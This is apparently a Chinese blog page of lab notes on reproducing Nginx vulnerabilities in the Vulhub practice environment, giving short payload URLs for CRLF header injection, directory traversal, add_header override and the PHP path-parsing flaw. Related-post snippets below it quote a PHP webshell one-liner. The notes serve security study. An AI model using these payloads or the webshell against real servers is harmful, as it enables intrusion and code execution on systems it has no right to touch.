vulhub-nginx

最新推荐文章于 2025-07-16 10:34:11 发布
最新推荐文章于 2025-07-16 10:34:11 发布
阅读量129 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44912035/article/details/113059492

CVE-2013-4547

影响范围
Nginx 0.8.41~1.4.3
Nginx 1.5.0~1.5.7

CVE-2017-7529越界读取缓存漏洞

影响范围
Nginx version 0.5.6 - 1.13.2
在这里插入图片描述

insecure-configuration

CRLF注入漏洞

Nginx会将$uri进行解码,导致传入%0a%0d即可引入换行符,造成CRLF注入漏洞。
payload:http://127.0.0.1/%0a%0dSet-Cookie:%20a=1%0a%0d%0a%0d%0a<!–

在这里插入图片描述

目录穿越漏洞

payload:http://127.0.0.1:8081/files…/

add_header被覆盖

payload:http://127.0.0.1:8082/test2#

nginx解析漏洞

原请求为http://127.0.0.1/uploadfiles/nginx.png
payload为:http://127.0.0.1/uploadfiles/nginx.png/.php

vulhub】ubuntu上搭建vulhub
Sulpice92的博客
12-22 2369
理论上最便捷的方法应该是下一个kali,kali自带有docker,而且官网上下的虚拟机镜像还可以直接使用;安装过程中遇到了不少网络问题,对虚拟机网卡配置、linux网络配置加深了理解;相当于是主动把靶场搭建过程复杂化了,但是收获也不少。
Vulhub靶场Nginx解析漏洞复现
mirliasheong的博客
12-21 881
原理:这个解析漏洞其实是PHP CGI的漏洞,在PHP的配置⽂件中有⼀个关键的选项cgi.fix_pathinfo默认是开启的,当URL中有不存在的⽂件,PHP就会向前递归解析。在⼀个⽂件/xx.jpg后⾯加上/.php会将 /xx.jpg/xx.php 解析为 php ⽂件。当Nginx得到⼀个⽤户请求时,⾸先对url进⾏解析,进⾏正则匹配,如果匹配到以.php后缀结尾的⽂件名,会将请求的PHP⽂件交给PHP-CGI去解析。上传成功,访问一下我们的文件,删除一个g,再抓包。再上传,发现上传成功了。
vulhub
03-10
Vulhub
Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行一条命令即可编译、运行一个完整的漏洞靶场镜像
10-21
Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行一条命令即可编译、运行一个完整的漏洞靶场镜像。
手把手教你搭建Vulhub靶场
最新发布
wly55690的博客
07-16 616
Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。使用Vulhub中的各种靶场需要安装docker和docker-compose,同时Vulhub只能安装到Liunx的环境中。接下来我会使用Ubuntu20系统为例为大家演示安装Vulhub靶场以及它所需要的环境。Vulhub靶场的官方网站 https://vulhub.org/
vulhubnginx
haoaaao的博客
05-01 351
0x00 CVE-2013-4547(文件上传——文件名逻辑漏洞) 1、简介 1)漏洞说明 这个漏洞主要原因是错误地解析了请求的URI,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。 2)影响版本: Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7 2、搭建 2、复现 1)1.php:<?php eval(\$_POST['x']);?> php马:<?php fwrite(...
vulhub-Nginx
Mccc_li的博客
05-19 351
test
Centos7漏洞库vulhub-master.zip
03-01
2. **网络服务漏洞**:CentOS 7上运行的各种服务,如Apache、Nginx、MySQL等,都可能包含可被利用的安全漏洞。了解这些服务的漏洞有助于你在实际环境中识别并修复潜在风险。 3. **操作系统漏洞**:Vulhub可能包含了...
Vulhub靶场】Nginx 中间件漏洞复现
M372109150的博客
05-02 4451
本文主要对nginx的漏洞进行复现,在vulhub靶场复现nginx文件名逻辑漏洞、Nginx越界读取缓存漏洞(CVE-2017-7529)、Nginx 配置错误导致漏洞以及解析漏洞。
vulhub Nginx文件解析漏洞
qq_51331767的博客
03-06 448
由于用户的配置问题,在php的配置文件中cgi.fix_pathinfo默认开启,当url中有不存在的文件,php会向前递归,将../.jpg/.php解析为/.php文件。将php-fpm.conf中的 security.limit_extensions =.php,只支持php后缀解析。http://IP/uploadfiles/图片.jpg/.php。在文件路径后加上.php,在进行访问,发现php代码已经被执行。访问http://IP/,看到这个页面表示漏洞环境搭建成功。访问文件的路径,正常访问。
kali/ubuntu安装vulhub
weixin_48878440的博客
06-29 540
kali部署安装vulhub靶场环境
vulhub-master.zip
01-20
vulhub-master.zip
vulhub】httpoxy漏洞(CVE-2016-5385)
qq_45300786的博客
09-13 1208
这个httpoxy漏洞,简单来说,就是可以截获用户http请求包,从而获取到一些敏感信息。 httpoxy简单理解 https://blog.csdn.net/zuoside__lord/article/details/107696503 NC监听 https://blog.csdn.net/qq_34640691/article/details/115740809?utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRL
ECShop
xiwangyizhicunzai的博客
12-21 752
ECShop 2.x/3.x SQL注入/任意代码执行漏洞 ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞,vulhub中使用其2.7.3最新版与3.6.0次新版进行漏洞...
Vulhub靶场
blalaa的博客
09-05 1882
【Django JSONField/HStoreField SQL 注入漏洞 】 ①原理 Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。 在Django中支持Postgresql的数据类型:JSONField、HStoreField、Arr
vulhub | vulhub安装教程,有这一篇就够了~(详细图解)
热门推荐
鱼溯的博客
01-31 1万+
vulhub | vulhub安装教程,有这一篇就够了,包含Centos和kali的安装,以及docker与docke-compose的详细命令(详细图解)
Vulhub 快速搭建、使用
angry_program的博客
02-17 6509
Vulhub是什么 Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 Docker和Docker-compose 文章参考来自: dockerfile 与 docker-compose的区别 先简单理解 docker 的使用过...
渗透必备:Kali 中安装漏洞靶场 Vulhub
liuhyusb的博客
08-25 262
我们都知道,在学习网络安全的过程中,搭建漏洞靶场有着至关重要的作用。复现各种漏洞,能更好的理解漏洞产生的原因,提高自己的学习能力。下面我在 kali 中演示如何详细安装漏洞靶场 Vulhub。2Vulhub 是一个基于 docker 和 docker-compose 的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。Vulhub 的官方地址为。3。
vulhub cgi
01-15
### Vulhub 中的 CGI 安全漏洞示例配置 #### Nginx 配置文件设置 为了展示如何通过 Vulhub 复现与 CGI 相关的安全漏洞,可以考虑使用 Nginx 的 CVE-2013-4547 漏洞作为例子。此漏洞允许攻击者利用特定条件下的 HTTP 请求来读取任意文件的内容。 在 `nginx.conf` 文件中,通常会包含如下配置片段用于启用 CGI 支持: ```nginx location /cgi-bin/ { root html; fastcgi_pass unix:/tmp/fcgi.sock; include fastcgi_params; } ``` 上述配置指定了 `/cgi-bin/` 路径下请求会被转发给 FastCGI 进程处理,并设置了 Unix 套接字路径以及包含了标准参数定义[^1]。 #### Docker Compose 启动命令 要启动带有该漏洞的环境,在 vulhub-master 下对应目录执行以下指令即可完成服务部署: ```bash sudo docker-compose up -d ``` 这条命令将会以后台模式运行容器化应用实例并保持其持续运作状态[^2]。 #### 测试访问点确认 一旦环境准备就绪,可以通过浏览器或其他工具向目标 URL 发送精心构造的数据包来进行测试。对于某些情况下可能还需要进一步操作才能触发预期行为,比如进入正在运行的服务内部查看临时文件是否存在等情况: ```bash docker-compose exec web bash ls /tmp/ ``` 这一步骤有助于验证是否能够成功创建指定位置上的标记文件,从而证明存在潜在风险[^3]。 尽管 AppWeb 是一个设计上注重安全性考量的小型高效 Web 服务器解决方案,但在实际环境中仍需谨慎对待任何第三方组件引入所带来的未知威胁因素[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值